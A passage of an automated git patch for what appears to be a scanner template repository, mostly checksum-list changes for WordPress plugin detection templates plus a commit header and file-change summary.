-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
-http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
+http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
-http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7186,7 +7186,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:ccdb31ce6e6817266259a78b75b323ceb7a67b58
+templates-checksum.txt:a7a1203f0524f3a186c5a1c456ed3b71fd250bcf
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From a12ed2f6ebe962d928cd9d435caa826ddc6c0b46 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 22 Sep 2023 10:38:39 +0000
Subject: [PATCH 0484/1090] TemplateMan Update [Fri Sep 22 10:38:39 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
